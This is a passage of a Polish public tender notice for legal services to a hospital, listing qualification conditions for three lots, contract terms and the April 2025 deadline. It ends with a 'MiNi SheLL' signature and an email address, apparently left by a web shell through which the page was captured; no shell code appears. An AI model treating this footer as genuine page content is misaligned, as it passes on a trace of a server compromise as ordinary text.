właściwą okręgową radę adwokacką lub radę okręgowej izby radców prawnych (w zależności od osoby pełniącej dyżur). <br/>Do oferty wykonawca dołącza wykaz osób skierowanych do realizacji zamówienia potwierdzający posiadanie wymaganych kwalifikacji oraz dokument potwierdzający wpisanie na właściwą listę samorządu zawodowego lub dokument potwierdzający wpis na listę prawników zagranicznych prowadzony przez właściwą okręgową radę adwokacką lub radę okręgowej izby radców prawnych (w zależności od osoby pełniącej dyżur).<br/>(Pakiet Nr 3.) - w trakcie trwania umowy będzie dysponował co najmniej co najmniej dwoma wskazanymi przez Wykonawcę zawodowymi prawnikami - posiadającymi tytuł zawodowy radcy prawnego lub adwokata oraz wpisanymi na właściwą listę samorządu zawodowego lub posiadającymi tytuł prawnika zagranicznego w rozumieniu ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej oraz wpisanymi na listę prawników zagranicznych prowadzoną przez właściwą okręgową radę adwokacką lub radę okręgowej izby radców prawnych (w zależności od osoby pełniącej dyżur). <br/>Do oferty wykonawca dołącza wykaz osób skierowanych do realizacji zamówienia potwierdzający posiadanie wymaganych kwalifikacji oraz dokument potwierdzający wpisanie na właściwą listę samorządu zawodowego lub dokument potwierdzający wpis na listę prawników zagranicznych prowadzony przez właściwą okręgową radę adwokacką lub radę okręgowej izby radców prawnych (w zależności od osoby pełniącej dyżur).<br/>Warunek II<br/>Dotyczy Pakietów Nr: 1,2,3. Wykonawca zobowiązany jest posiadać doświadczenie w wykonaniu minimum jednej usługi trwającej nie mniej niż 12 miesięcy, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie polegającej na świadczeniu pomocy prawnej dla podmiotu leczniczego w rozumieniu art. 4 ustawy z dnia 15 kwietnia 2011 o działalności leczniczej, który łącznie: <br/>a) wykonuje działalność leczniczą w rodzaju stacjonarne i całodobowe świadczenia zdrowotne szpitalne, <br/>b) jest zakwalifikowany do systemu podstawowego szpitalnego zabezpieczenia świadczeń opieki zdrowotnej, o którym mowa 95l ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych.<br/>Warunek III<br/>Pakiet Nr 1. Wykonawca zobowiązany jest posiadać doświadczenie w opiniowaniu umów na badania kliniczne w rozumieniu art. 2 pkt 2 ustawy z dnia 9 marca 2023 r. o badaniach klinicznych produktów leczniczych stosowanych u ludzi lub ustawy 6 września 2001 r. Prawo farmaceutyczne (minimum pięciu w zakresie badań klinicznych) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie). <br/>Do oferty wykonawca dołącza wykaz usług wskazujący miejsce i termin ich realizacji oraz dokumenty potwierdzające zakres realizacji usługi i ich należyte wykonanie / wykonywanie.<br/>Pakiet Nr 2. <br/>- Wykonawca zobowiązany jest posiadać doświadczenie w występowaniu jako pełnomocnik Zamawiającego przed Krajową Izbą Odwoławczą (w minimum pięciu sprawach toczących się przed KIO), w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie). <br/>- Wykonawca zobowiązany jest posiadać doświadczenie w świadczeniu pomocy prawnej w podmiocie leczniczym w zakresie zamówień publicznych, kontraktowania świadczeń zdrowotnych, w tym z NFZ, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie. <br/>Do oferty wykonawca dołącza wykaz usług wskazujący miejsce i termin ich realizacji (w tym informację o występowaniu w sprawach toczących się przed KIO, uwzględnieniem sygnatury sprawy) oraz dokumenty potwierdzające zakres realizacji usług i ich należyte wykonanie / wykonywanie.<br/>Pakiet Nr 3. <br/>- Wykonawca, aby ubiegać się o zamówienie (spełnić warunek udziału w postępowaniu) zobowiązany jest posiadać doświadczenie w wykonaniu usług minimum jednej w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie polegających na świadczeniu pomocy prawnej dla podmiotu leczniczego w rozumieniu art. 4 ustawy z dnia 15 kwietnia 2011 o działalności leczniczej prowadzonego w formie spółki kapitałowej, w której wartość nominalna udziałów albo akcji należących Skarbu Państwa, jednostki samorządu terytorialnego oraz jednoosobowej spółki Skarbu Państwa o szczególnym znaczeniu dla gospodarki państw stanowi nie mniej niż 51% kapitału zakładowego spółki, a w przypadku prostej spółki akcyjnej liczba akcji należących Skarbu Państwa, jednostki samorządu terytorialnego oraz jednoosobowej spółki Skarbu Państwa o szczególnym znaczeniu dla gospodarki państw stanowi nie mniej niż 51% ogólnej liczby akcji tej spółki, oraz Skarb Państwa, jednostka samorządu terytorialnego oraz jednoosobowa spółka Skarbu Państwa o szczególnym znaczeniu dla gospodarki państw ta dysponuje bezpośrednio większością głosów na zgromadzeniu wspólników albo walnym zgromadzeniu. <br/>- Wykonawca, aby ubiegać się o zamówienie (spełnić warunek udziału w postępowaniu) zobowiązany jest posiadać doświadczenie w świadczeniu pomocy prawnej w podmiocie leczniczym zatrudniającym co najmniej 1000 pracowników w zakresie prawa pracy i ubezpieczeń społecznych, bezpieczeństwa i higieny pracy oraz udzielania świadczeń zdrowotnych na podstawie art. 26-27 ustawy o działalności leczniczej (obsługa co najmniej 10 postępowań prowadzonych w trybie konkursu ofert na udzielanie świadczeń zdrowotnych) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie. <br/>Do oferty wykonawca dołącza wykaz usług wskazujący miejsce i termin ich realizacji oraz dokumenty potwierdzające zakres realizacji usług i ich należyte wykonanie / wykonywanie.<br/>Pozostałe informacje zawiera SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowe informacje zawiera Projekt umowy stanowiący załącznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://szpitalsiedlce.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-22 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com